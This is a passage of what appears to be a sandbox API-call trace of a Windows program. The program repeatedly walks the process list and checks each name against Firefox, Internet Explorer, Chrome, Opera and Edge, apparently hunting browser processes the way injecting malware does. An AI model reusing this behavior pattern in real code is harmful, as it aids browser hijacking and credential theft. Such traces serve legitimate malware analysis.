lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0242.341] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0242.341] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0242.341] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0242.341] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0242.341] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.341] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.342] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.342] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.342] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.342] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.342] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.342] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.342] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0242.342] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0242.342] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0242.342] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0242.342] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.342] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.343] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.343] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.343] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.343] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0242.343] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.343] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0242.343] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0242.343] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0242.343] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0242.343] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0242.343] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.343] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.344] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0242.344] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0242.344] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0242.344] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0242.344] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.344] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.345] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0242.345] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.345] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.346] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0242.346] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.346] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0242.347] CloseHandle (hObject=0xe8) returned 1 [0242.347] Sleep (dwMilliseconds=0x3e8) [0243.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0243.355] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.355] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0243.355] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0243.355] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0243.355] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0243.355] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0243.355] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.356] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0243.356] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0243.356] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0243.356] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0243.356] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0243.356] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.356] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0243.356] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0243.356] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0243.356] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0243.356] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.356] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.357] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0243.357] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0243.357] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0243.357] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0243.357] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.357] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.357] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0243.357] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0243.358] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0243.358] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0243.358] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.358] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.358] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0243.358] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0243.358] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0243.358] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0243.358] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.358] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.359] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0243.359] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0243.359] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0243.359] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0243.359] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.359] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.359] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0243.359] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0243.359] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0243.359] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0243.359] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.359] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.360] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0243.360] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0243.360] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0243.360] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0243.360] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.360] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0243.360] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0243.360] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0243.360] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0243.360] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0243.360] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.361] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.361] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.361] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.361] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.361] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.361] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.361] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.362] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.362] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.362] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.363] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.363] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.363] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.364] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0243.364] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0243.364] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0243.364] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0243.364] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.364] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.364] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.364] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.365] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.365] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.365] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.367] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0243.367] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0243.367] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0243.367] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0243.367] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.367] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.367] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0243.367] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0243.367] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0243.367] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0243.367] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.367] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.368] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0243.368] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0243.368] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0243.368] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0243.368] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.368] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.368] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.368] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.368] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.369] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.369] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.369] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.369] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0243.369] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0243.369] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0243.369] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0243.369] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.369] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0243.370] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0243.370] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0243.370] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0243.370] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0243.370] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.370] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0243.370] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0243.370] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0243.370] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0243.370] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0243.370] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.370] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0243.371] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0243.371] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0243.371] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0243.371] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0243.371] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.371] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 